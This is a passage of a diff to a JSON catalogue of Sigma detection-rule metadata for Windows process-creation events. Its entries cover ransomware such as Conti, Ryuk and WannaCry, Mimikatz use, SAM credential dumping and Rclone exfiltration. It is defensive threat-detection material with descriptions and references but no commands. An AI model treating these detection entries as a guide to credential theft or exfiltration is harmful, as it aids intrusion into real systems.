"filename": "proc_creation_win_windowsoptionalfeature.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" + "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windowsoptionalfeature.yml" ], "tags": [ - "attack.exfiltration" + "attack.defense_evasion" ] }, - "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", - "value": "Suspicious PowerShell Mailbox Export to Share" + "uuid": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "value": "Potential Suspicious Windows Feature Enabled - ProcCreation" }, { - "description": "Detects a command used by conti to find volume shadow backups", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", + "author": "frack113", + "creation_date": "2021/07/30", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_malware_conti.yml", - "level": "high", + "filename": "proc_creation_win_susp_recon.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" - ], - "tags": [ - "attack.t1587.001", - "attack.resource_development" - ] - }, - "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", - "value": "Conti Volume Shadow Listing" - }, - { - "description": "Detects a command used by conti to exfiltrate NTDS", - "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_malware_conti_7zip.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" ], "tags": [ "attack.collection", - "attack.t1560" + "attack.t1119" ] }, - "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", - "value": "Conti NTDS Exfiltration Command" + "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "value": "Recon Information for Export with Command Prompt" }, { - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.", "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", + "author": "Florian Roth", + "creation_date": "2018/12/04", "falsepositive": [ - "Some rare backup scenarios" + "Unknown" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml", + "filename": "proc_creation_win_apt_apt29_thinktanks.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" ], "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.g0016", + "attack.t1059.001" ] }, - "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "value": "Sensitive Registry Access via Volume Shadow Copy" + "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", + "value": "APT29" }, { "description": "Detects typical Dridex process patterns", @@ -41840,164 +34255,239 @@ "value": "Dridex Process Pattern" }, { - "description": "Detects specific process parameters as seen in DTRACK infections", + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/30", + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_reg_dump_sam.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", + "value": "Registry Dump of SAM Creds and Secrets" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_malware_dtrack.yml", + "filename": "proc_creation_win_reg_delete_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "value": "Delete Services Via Reg Utility" + }, + { + "description": "Detects CrackMapExecWin Activity as Described by NCSC", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_dragonfly.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/my-name-is-dtrack/93338/", - "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", - "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", + "https://attack.mitre.org/software/S0488/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml" + ], + "tags": [ + "attack.g0035", + "attack.credential_access", + "attack.discovery", + "attack.t1110", + "attack.t1087" + ] + }, + "uuid": "04d9079e-3905-4b70-ad37-6bdf11304965", + "value": "CrackMapExecWin" + }, + { + "description": "Detects a \"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_dllhost_no_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://redcanary.com/blog/child-processes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "value": "Dllhost Process With No CommandLine" + }, + { + "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/12/11", + "falsepositive": [ + "Legitimate usage of Setres" + ], + "filename": "proc_creation_win_lolbin_setres.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", + "https://lolbas-project.github.io/lolbas/Binaries/Setres/", + "https://twitter.com/0gtweet/status/1583356502340870144", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", + "value": "Use of Setres.exe" + }, + { + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "meta": { + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/10", + "falsepositive": [ + "Legitimate RClone use" + ], + "filename": "proc_creation_win_susp_rclone_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "value": "Rclone Execution via Command Line or PowerShell" + }, + { + "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Some rare backup scenarios" + ], + "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, - "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "value": "DTRACK Process Creation" + "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", + "value": "Copy from Volume Shadow Copy" }, { - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", + "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups", "meta": { - "author": "Florian Roth", - "creation_date": "2019/09/30", + "author": "Florian Roth, Markus Neis", + "creation_date": "2018/08/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_builtin_commands_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://twitter.com/haroonmeer/status/939099379834658817", + "https://twitter.com/c_APT_ure/status/939475433711722497", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ] + }, + "uuid": "2887e914-ce96-435f-8105-593937e90757", + "value": "Reconnaissance Activity Using BuiltIn Commands" + }, + { + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_malware_emotet.yml", + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", - "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", - "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", - "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "value": "Emotet Process Creation" - }, - { - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/09/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_malware_formbook.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", - "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", - "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", - "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "value": "Formbook Process Creation" - }, - { - "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", - "meta": { - "author": "Florian Roth, Tom Ueltschi", - "creation_date": "2019/01/16", - "falsepositive": [ - "Admin activity" - ], - "filename": "proc_creation_win_malware_notpetya.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/schroedingers-petya/78870/", - "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.t1070.001", - "attack.credential_access", - "attack.t1003.001", - "car.2016-04-002" + "attack.t1574.002" ] }, - "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", - "value": "NotPetya Ransomware Activity" - }, - { - "description": "Detects QBot like process executions", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_malware_qbot.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/killamjr/status/1179034907932315648", - "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005" - ] - }, - "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "value": "QBot Process Creation" - }, - { - "description": "Detects Ryuk ransomware activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/16", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_malware_ryuk.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", - "value": "Ryuk Ransomware" + "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "value": "DLL Sideloading by VMware Xfer Utility" }, { "description": "Detects wscript/cscript executions of scripts located in user directories", @@ -42025,671 +34515,127 @@ "value": "WScript or CScript Dropper" }, { - "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", "meta": { - "author": "David Burkett, Florian Roth", - "creation_date": "2019/12/28", - "falsepositive": [ - "Rare System Admin Activity" - ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ] - }, - "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", - "value": "Trickbot Malware Recon Activity" - }, - { - "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/11/26", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" - ], - "tags": [ - "attack.execution", - "attack.t1559" - ] - }, - "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "value": "Trickbot Malware Activity" - }, - { - "description": "Detects WannaCry ransomware activity", - "meta": { - "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_malware_wannacry.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", - "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" - ] - }, - "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", - "value": "WannaCry Ransomware" - }, - { - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "meta": { - "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2017/11/10", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_mal_adwind.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ] - }, - "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "value": "Adwind RAT / JRAT" - }, - { - "description": "Attempts to detect system changes made by Blue Mockingbird", - "meta": { - "author": "Trent Liffick (@tliffick)", - "creation_date": "2020/05/14", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_mal_blue_mockingbird.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blue-mockingbird-cryptominer/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" - ] - }, - "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "value": "Blue Mockingbird" - }, - { - "description": "Detects DarkSide Ransomware and helpers", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/14", - "falsepositive": [ - "Unknown", - "UAC bypass method used by other malware" - ], - "filename": "proc_creation_win_mal_darkside_ransomware.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", - "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", - "value": "DarkSide Ransomware Pattern" - }, - { - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" - ] - }, - "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f", - "value": "Hermetic Wiper TG Process Patterns" - }, - { - "description": "Detects LockerGoga Ransomware command line.", - "meta": { - "author": "Vasiliy Burov, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_mal_lockergoga_ransomware.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", - "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", - "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ] - }, - "uuid": "74db3488-fd28-480a-95aa-b7af626de068", - "value": "LockerGoga Ransomware" - }, - { - "description": "Detects Ryuk Ransomware command lines", - "meta": { - "author": "Vasiliy Burov", - "creation_date": "2019/08/06", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_mal_ryuk.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "0acaad27-9f02-4136-a243-c357202edd74", - "value": "Ryuk Ransomware Command Line Activity" - }, - { - "description": "Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_manage_bde_lolbas.yml", + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", - "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", - "https://twitter.com/bohops/status/980659399495741441", - "https://twitter.com/JohnLaTwC/status/1223292479270600706", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" + "https://twitter.com/0gtweet/status/1560732860935729152", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "value": "Suspicious Usage of the Manage-bde.wsf Script" - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "meta": { - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "creation_date": "2019/10/26", - "falsepositive": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" - ], - "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ] - }, - "uuid": "15619216-e993-4721-b590-4c520615a67d", - "value": "Meterpreter or Cobalt Strike Getsystem Service Start" - }, - { - "description": "Detection well-known mimikatz command line arguments", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", - "creation_date": "2019/10/22", - "falsepositive": [ - "Legitimate Administrator using tool for password recovery" - ], - "filename": "proc_creation_win_mimikatz_command_line.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" - ] - }, - "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", - "value": "Mimikatz Command Line" - }, - { - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "meta": { - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", - "creation_date": "2020/03/04", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_mmc20_lateral_movement.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" - ], - "tags": [ - "attack.execution", - "attack.t1021.003" - ] - }, - "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "value": "MMC20 Lateral Movement" - }, - { - "description": "Detects a Windows command line executable started from MMC", - "meta": { - "author": "Karneades, Swisscom CSIRT", - "creation_date": "2019/08/05", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_mmc_spawn_shell.yml", - "level": "high", - "logsource.category": 